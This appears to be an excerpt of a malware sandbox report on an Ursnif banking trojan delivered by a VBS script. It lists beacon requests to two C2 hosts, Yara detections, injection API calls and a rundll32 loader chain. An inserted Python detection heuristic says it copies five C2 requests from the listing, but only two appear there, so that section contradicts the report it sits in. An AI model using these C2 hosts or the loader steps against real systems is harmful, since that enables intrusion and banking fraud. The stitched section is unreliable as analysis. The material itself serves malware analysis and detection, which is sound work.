Source: global traffic; HTTP traffic detected: GET /J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic; HTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Content-Length: 2 | Host: art.microsoftsofymicrosoftsoft.at
Source: Joe Sandbox View; ASN Name: DHUBRU DHUBRU
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 13 Sep 2021 09:05:28 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Vary: Accept-Encoding | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp; String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000019.00000003.1134490051.000001B6EB600000.00000004.00000001.sdmp; String found in binary or memory: http://crl.m-
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp; String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000019.00000002.1216995781.000001B6D2DE1000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown; DNS traffic detected: queries for: atl.bigbigpoppa.com
                    Source: unknownHTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
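                    The five request paths above share a structure a detection can key on: a long blob chopped into many pseudo-random segments whose only non-alphanumeric characters are the tokens `_2B` and `_2F`, which read as URL-encoded `+` and `/` (`%2B`, `%2F`) with the percent sign swapped for an underscore. The segment breaks fall without regard to those tokens, so a token can straddle a slash (`J6_/2Bpy6` in the first request, `ZB_2/Fhqk` in the second), which a naive substring count misses. The block below is an added example for this report, not sandbox output: it scores the five request tuples copied from the traffic listing against constructed benign requests. The thresholds, the `lookalike_brand_host` check (prompted by the second C2 host carrying the string "microsoft" under an unrelated domain), the benign samples and the rule names are assumptions.

```python
"""
Heuristic scoring of the C2 request paths listed above. Added example for this
report, not sandbox output: the five request tuples are copied from the HTTP
traffic section; the benign requests, thresholds and rule names are assumptions.
"""
import re
from dataclasses import dataclass

# "_2B" / "_2F" read as URL-encoded '+' and '/' ("%2B", "%2F") with '%' swapped for '_'.
ENCODED_TOKEN = re.compile(r"_2[BF]", re.I)
BASE64_ALPHABET = re.compile(r"[A-Za-z0-9+/]+")


@dataclass
class UriVerdict:
    segments: int        # non-empty path components
    joined_len: int      # length of the path with every '/' removed
    tokens: int          # encoded tokens counted after joining the segments
    split_tokens: int    # tokens that only exist once a '/' is removed
    base64_like: bool    # after un-encoding, only base64 characters remain
    suspicious: bool


def analyze_path(path: str) -> UriVerdict:
    """Score one request path; the thresholds are assumptions tuned to this sample."""
    path = path.split("?", 1)[0]
    segments = [s for s in path.split("/") if s]
    joined = "".join(segments)
    # The blob is chopped into segments without regard to token boundaries, so a
    # token may straddle a slash ("J6_/2Bpy6"); count before and after joining.
    tokens_raw = len(ENCODED_TOKEN.findall(path))
    tokens = len(ENCODED_TOKEN.findall(joined))
    decoded = ENCODED_TOKEN.sub(lambda m: "+" if m.group(0)[-1].upper() == "B" else "/", joined)
    base64_like = BASE64_ALPHABET.fullmatch(decoded) is not None
    suspicious = len(segments) >= 8 and len(joined) >= 150 and tokens >= 3 and base64_like
    return UriVerdict(len(segments), len(joined), tokens, tokens - tokens_raw, base64_like, suspicious)


def lookalike_brand_host(host: str, brand: str = "microsoft", legit: str = "microsoft.com") -> bool:
    """True when a brand string appears in a host that is not under the brand's real domain."""
    host = host.lower().rstrip(".")
    return brand in host and host != legit and not host.endswith("." + legit)


def triage(requests):
    """requests: iterable of (method, path, host) -> list of (host, path_suspicious, host_lookalike)."""
    return [(host, analyze_path(path).suspicious, lookalike_brand_host(host))
            for _method, path, host in requests]


REPORT_REQUESTS = [  # copied from the HTTP traffic listed above
    ("GET", "/_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw", "atl.bigbigpoppa.com"),
    ("GET", "/ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5", "atl.bigbigpoppa.com"),
    ("GET", "/fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W", "atl.bigbigpoppa.com"),
    ("GET", "/J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD", "art.microsoftsofymicrosoftsoft.at"),
    ("POST", "/0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6", "art.microsoftsofymicrosoftsoft.at"),
]
BENIGN_REQUESTS = [  # constructed negatives, not from the report
    ("GET", "/images/logo.png", "www.example.com"),
    ("GET", "/api/v1/users/42?fields=name", "api.example.com"),
    ("GET", "/wp-content/uploads/2021/09/report_2B.pdf", "blog.example.com"),
]

if __name__ == "__main__":
    for row in triage(REPORT_REQUESTS + BENIGN_REQUESTS):
        print(row)
```

The path score deliberately ignores the User-Agent, because the sample's requests carry a plausible Firefox string; the only header-level oddity visible in the listing is the `Content-Length: 2` POST, which is a weak signal on its own. Counting tokens only after removing the slashes is the part that matters: the first request has exactly one token that exists only in the joined form, and a rule written against the raw path would under-count it.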

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    Yara detected Ursnif
                    Source: Yara match | File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
                    Source: Yara match | File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY

                    E-Banking Fraud:

                    Yara detected Ursnif
                    Source: Yara match | File sources: identical to the 30 memory dumps, process memory spaces and unpacked PE images listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC3276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

                    System Summary:

                    Writes registry values via WMI
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB2274
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC7E30
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC725F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC1754
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E63570
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E490A1
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E45C88
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E4FBA9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E543B9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E57B5D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5DAED
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBB948
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBB230
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA70C8
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00C990FC
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB88B8
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00C91000
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA7820
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAA9F8
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA6944
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAE95C
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA4150
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA1164
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB5164
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA0124
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00C92138
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00C99AD8
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CABA74
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00C9ABDC
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB4BA0
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBA3A4
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00C91348
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA8340
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB4354
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00C94B60
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB730C
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAD328
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA4484
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00C974A4
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB9408
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB3400
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB4DE0
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA1DF4
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA559C
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA5DBC
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA9500
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA2EC0
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAC6C4
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB5ED8
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB2EF8
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00C976F4
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA6684
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB6EA0
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB06B4
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00C93610
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAA790
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAF7B4
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5FEAB CreateProcessAsUserW
                    Source: presentation[2021.09.09_15-26].vbs | Initial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB1382 GetProcAddress,NtCreateSection,memset
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB1B4A NtMapViewOfSection
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB2495 NtQueryVirtualMemory
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC6EB3 GetProcAddress,NtCreateSection,memset
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC40DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC7666 NtMapViewOfSection
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC8055 NtQueryVirtualMemory
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E609D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5A8F7 NtMapViewOfSection
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E58890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5B878 GetProcAddress,NtCreateSection,memset
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E55878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5F7F5 NtQueryInformationProcess
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E437F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E6079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E56657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E50E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E555D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E45166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E49D36 NtGetContextThread,RtlNtStatusToDosError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E50CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E60BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E50FBD memset,NtQueryInformationProcess
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E4579C NtQuerySystemInformation,RtlNtStatusToDosError
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBA8F0 NtSetInformationProcess,CreateRemoteThread
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAE860 NtQueryInformationProcess
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CCF029 NtProtectVirtualMemory,NtProtectVirtualMemory
                    Source: C:\Windows\System32\control.exe | Code function: 32_2_00CCF36B NtProtectVirtualMemory
                    Source: tjafqng0.dll.27.dr | Static PE information: No import functions for PE file found
                    Source: qlsida3o.dll.29.dr | Static PE information: No import functions for PE file found
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210913
                    Source: classification engine | Classification label: mal100.troj.evad.winVBS@22/20@6/1
                    Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs'
                    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs'
                    Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                    Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
